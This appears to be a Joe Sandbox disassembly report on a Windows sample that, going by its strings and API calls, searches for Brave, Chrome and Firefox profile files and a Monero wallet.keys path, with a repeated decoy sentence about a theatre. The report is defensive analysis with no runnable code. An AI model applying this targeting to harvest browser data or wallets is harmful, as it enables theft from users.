Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
Instruction ID: 1bd45dde8bb29b977586d0184707eef98793eb8730a4ec1a61e87fa801f861ab
Opcode Fuzzy Hash: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
Instruction Fuzzy Hash: D9A17CB56022419FD34CEFA8FD8896637F9F74C301734472BAA45C3264DB399941DB26

Function 006945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0069460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0069479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0069474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006945DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006946C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00694734

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: c7c73491a119857f18d888e07c346c2432384f44e101b7d5a502daf304f159ea
Instruction ID: 4879825e6e029ac31f2404724563a9d443d02f1a20653f48569c382d40625a40
Opcode Fuzzy Hash: c7c73491a119857f18d888e07c346c2432384f44e101b7d5a502daf304f159ea
Instruction Fuzzy Hash: 504126A07D260C6BC6A5B7A4A8EEFDE77575F52700F915240EC499A280CBF065C0C73B

Function 0069BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,006B0B32,006B0B2B,00000000,?,?,?,006B13F4,006B0B2A), ref: 0069BEF5
StrCmpCA.SHLWAPI(?,006B13F8), ref: 0069BF4D
StrCmpCA.SHLWAPI(?,006B13FC), ref: 0069BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069C7BF
FindClose.KERNEL32(000000FF), ref: 0069C7D1

Strings

\Brave\Preferences, xrefs: 0069C1DB
Google Chrome, xrefs: 0069C634
Preferences, xrefs: 0069C11E
Brave, xrefs: 0069C102

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 0205bcfddaf7dcc69ae0b1fa5999cfa687e23b30b37819869ec881f32a9e0cc4
Instruction ID: 907bcddabd7be63391425107170f1cb041b3818e40ffaf6835fa826e699cad55
Opcode Fuzzy Hash: 0205bcfddaf7dcc69ae0b1fa5999cfa687e23b30b37819869ec881f32a9e0cc4
Instruction Fuzzy Hash: 36425272910104ABCF94FBA0DD96EEE737EAB85300F40455DB90A96181EF349F49CFA6

Function 006A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 006A492C
FindFirstFileA.KERNEL32(?,?), ref: 006A4943
StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
FindClose.KERNEL32(000000FF), ref: 006A4B92

Strings

%s\*, xrefs: 006A4920
%s\%s, xrefs: 006A49FB
%s\%s, xrefs: 006A49A4

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 9b5db06526d79e356faa5878ee140f7bab487c7a65933fb6ee000146ff44507d
Instruction ID: e7af09bcc0e978bf090a0b3b81245dfb338b62147468584e5292ac1bf5f4bf98
Opcode Fuzzy Hash: 9b5db06526d79e356faa5878ee140f7bab487c7a65933fb6ee000146ff44507d
Instruction Fuzzy Hash: 156153B1900218ABCB24EBA0DC45EFB777DBB89700F04869DB50996141EF75EB85CFA1

Function 006A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 006A3EC3
FindFirstFileA.KERNEL32(?,?), ref: 006A3EDA
StrCmpCA.SHLWAPI(?,006B0FAC), ref: 006A3F08
StrCmpCA.SHLWAPI(?,006B0FB0), ref: 006A3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 006A406C
FindClose.KERNEL32(000000FF), ref: 006A4081

Strings

%s\%s, xrefs: 006A3EB7

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 554d4b22301d6ed6e0a6dcb94f3eb7a45794c2f0048c1939a33eadbc8f87c22b
Instruction ID: 7340711d45537928c68b28568ad0fa737948d98c5aa643446a137ccb8e4546d9
Opcode Fuzzy Hash: 554d4b22301d6ed6e0a6dcb94f3eb7a45794c2f0048c1939a33eadbc8f87c22b
Instruction Fuzzy Hash: 545164B2900218ABCB24FBB0DC85EFA737DBB45300F00469DB65996150EB75EB85CF95

Function 0069F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069FAB1
FindClose.KERNEL32(000000FF), ref: 0069FAC3

Strings

prefs.js, xrefs: 0069F812

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
